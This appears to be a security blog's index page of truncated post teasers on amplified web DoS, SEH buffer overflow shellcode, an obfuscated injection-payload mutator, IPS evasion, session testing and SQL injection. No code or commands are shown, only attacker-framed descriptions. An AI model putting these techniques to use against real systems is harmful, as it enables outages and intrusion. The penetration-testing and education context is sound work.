Elusive Thoughts

Introduction In this article I am going to explain how to perform an amplified Denial Of Service (DoS) attack on a Web Application in a high level manner, but you should be aware that these are real world scenarios that I have implemented during costumer penetration tests. A successful DoS attack on a Web Application should happen in three different layers, the Web Application, the Web Application platform and the Web Server itself. It is common knowledge of course that you don't have to attack all three layers to successfully compromise the availability of a Web Server, but optimizing a DoS attack should be desirable from the perspective of an attacker. By using the word optimize I mean three things: Reduce to minimum the amount of the machines generating malicious traffic. Increase the amount Web Server downtime.  Increase the amount of remediation time (e.g. recover time). Increase collateral damage (e.g. break the database).  But first I should...

Introduction Cybercrime has evolved into an industry whose value in fraud and stolen property exceeded one trillion dollars in 2009. By contrast, in 2007, professional hacking represented a multibillion-dollar industry. What explains this rapid growth? Industrialization. Just as the Industrial Revolution advanced methods and accelerated assembly from single to mass production in the 19th century, today’s cybercrime industry has similarly transformed and automated itself to improve efficiency, scalability, and profitability. The industrialization of hacking coincides with a critical shift in focus. Previously, hackers concentrated attacks on breaking perimeter defences. But today, the goal has changed. The objective is no longer perimeter penetration and defense. Today’s hacker is intent on seizing control of data and the applications that move this data. This is why attacks against Web applications constitute more than 60 percent of total attack attempts observed on the Internet. ...

Intro In this post is the final and last post from the Over The Flow Series (you have to read and understand all previous 3 posts to figure out what is going on here). I will finally insert and execute a shell-code in our vulnerable application. But in this article we will also do further analysis on the SEH exploitation and I will try to fully describe exactly what happened in order to gain a remote shell. But first we should be the appropriate music:  Note: Paranoia niiiiiiiiice music FYI. Prerequisites To understand all the shit I’ll try to explain you, you should fulfill the following requisites: Basic X86 assembly. Debugging with ollydebug. Basic knowledge of exploitation basics in structured exception handling . Note: Of course you would also have to read the previous three parts .  Again a little about Structured Exception Handling  (as a reminder) The Structured Exception Handler (SEH) is used to handle exceptions within Windows prog...

Intro   Elusive Thoughts are proud to present you The Teenage Mutant Ninja Turtles project.... What Teenage Mutant Ninja Turtles is? The Teenage Mutant Ninja Turtles project is three things: A Web Application payload database (heavily based on fuzzdb project for now). A Web Application error database. A Web Application payload mutator. Nowadays all high profile sites found in financial and telecommunication sector use filters to filter out all types of vulnerabilities such as SQL, XSS, XXE, Http Header Injection e.t.c. In this particular project I am going to provide you with a tool to generate Obfuscated Fuzzing Injection attacks on order to bypass badly implemented Web Application injection filters (e.t.c SQL Injections, XSS Injections e.t.c). When you test a Web Application all you need is a fuzzer and ammunition: " I saw clearly that war was upon us when I learned that my young men had been secretly buying ammunition." Chief Joseph Ammunit...

Intro This post is about describing from the security perspective how the life cycle of a Web Application should be. By saying life cycle I mean all the stages a session goes through and what are the steps to be taken on order to properly test the session. Very recently I had a discussion about session management with a colleague of mine and he seemed confused about what session management is and how it should be handled. Now if you lookup the OWASP session management cheat sheet you are going to find lots of interesting information overlapping the information presented here but, there is no information in the internet that has a complete and easy to understand guide about how to test a session. What is a Session and how should it behave A web application session is a user credential "representative" for as long as the user is logged in (well not always). In more simple words the user credentials after a successful log-in should be translated into one or more cry...

Intro This article is the second part from the "Ask and you shall receive" series. Almost a month ago I received a comment from tborland1 and he/she was kind enough to explain to me that the first article had nothing to do with bypassing IPS/IDS devices, which by the way is true. But it did explain about rapid payload delivery and it did mention that the fragroute tool (and some other tools) can be used to bypass this type of devices, so in this article I will show more specifically how to bypass the Symantec Endpoint IPS/IDS software. But the most important is that I did explain from scratch the underlying technologies and the basic concept, which by the way is that a buffer overflow is a simple string just like an SQL injection string and that you can manipulate that sting to do WHAT EVER YOU WANT with it. But before I start talking about the buffer overflow obfuscation I will talk first about the different stages a buffer over flow goes before reaching the target mach...

Introduction Cyber criminals are increasingly using automated SQL injection attacks powered by botnets and AI-assisted tooling to hit vulnerable systems. SQL injection remains the most reliable way to compromise front-end web applications and back-end databases, and it continues to hold its position in the OWASP Top 10 (ranked as A03:2021 — Injection). Despite decades of awareness, the attack surface keeps expanding — not shrinking. But why does this keep happening? The answer is straightforward: we are living in an era of industrialized hacking . SQL injection attacks are carried out by typing malformed SQL commands into front-end web application input boxes that are tied to database accounts, tricking the database into offering more access than the developer intended. The reason for the sustained prevalence of SQL injection is twofold: first, criminals are using automated and manual SQL injection attacks powered by botnets, professional hackers, and now AI-driven fuzzing tools t...